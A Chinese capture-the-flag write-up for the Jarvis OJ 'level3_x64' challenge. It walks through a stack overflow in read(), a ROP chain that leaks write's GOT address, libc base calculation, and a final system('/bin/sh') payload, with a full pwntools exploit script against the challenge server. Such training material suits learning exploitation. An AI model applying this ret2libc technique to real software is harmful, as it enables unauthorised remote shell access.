Jarvis OJ XMAN LEVEL3x64

思路

• 解压后看checksec发现没有开栈保护，美滋滋

  
  
  

  check3.png

• 因为没有开栈保护，所以会想到从栈溢出入手，查看函数发现溢出点在read（）buf只有0x80的长度，加上return一共要覆盖0x88大小的空间

  
  
  

  buf1.png

buf2.png

• 剩下的问题是如何构建shellcode，从解压后的另一个文件libc.2.19.so中我们发现了system函数以及“/bin/sh”，因此我可以调用链接库，得到system和“/bin/sh”偏移后的地址，但重点是如何找到system和“/bin/sh”在内存中的地址？

• 从网上的wp可知，函数在内存中的地址与偏移后的地址的差值是所有函数都一样的，因此我们只要知道某个函数的内存地址和偏移后的地址，剩下的函数只需要知道偏移后的地址即可求回原地址

• 例如，我们以write函数为例，因为plt和got表的原因，函数的真实地址在got表中，因此我们可以通过got[]得到write函数got表的地址，这样只要我们在后续步骤中，用此时得到的地址减去在偏移后的地址 即可得到固定的那个差值，但每一次运行，write在got表中的地址可能不一样，因此我们要将这个got表的地址泄露出来，使用write函数（注意64位的传参，使用ROPgadget），将got表中的地址显示，在交互中则变量接受该地址

Ropgadget.png

payload0="a"*0x88
payload0+=p64(rdiset)+p64(1)
payload0+=p64(rsiset)+p64(writegot)
payload0+=p64(8)
payload0+=p64(writeplt)+p64(vuladdr)

p.recvuntil("Input:\n")
p.sendline(payload0)
writeaddr=u64(p.recv(8))

• 剩下的就是得到system和“/bin/sh”在链接库中的偏移后地址，进行运算，再写payload，该payload就将system函数作为返回地址，“/bin/sh”作为参数，构建shellcode

succeed.png

代码

from pwn import *

p=remote("pwn2.jarvisoj.com", "9883")
elf=ELF('./level3_x64')
libc=ELF('./libc-2.19.so')

vuladdr=0x4005e6
writeplt=elf.symbols['write']
writegot=elf.got['write']
rdiset=0x00000000004006b3 
rsiset=0x00000000004006b1 

payload0="a"*0x88
payload0+=p64(rdiset)+p64(1)
payload0+=p64(rsiset)+p64(writegot)
payload0+=p64(8)
payload0+=p64(writeplt)+p64(vuladdr)

p.recvuntil("Input:\n")
p.sendline(payload0)
writeaddr=u64(p.recv(8))

sysoffest=libc.symbols['system']
binoffest=libc.search('/bin/sh').next()

systemaddr=writeaddr-libc.symbols['write']+sysoffest
binshaddr=writeaddr-libc.symbols['write']+binoffest

payload1='a'*0x88
payload1+=p64(rdiset)+p64(binshaddr)
payload1+=p64(systemaddr)+p64(8)

p.recvuntil("Input:\n")
p.sendline(payload1)
p.interactive()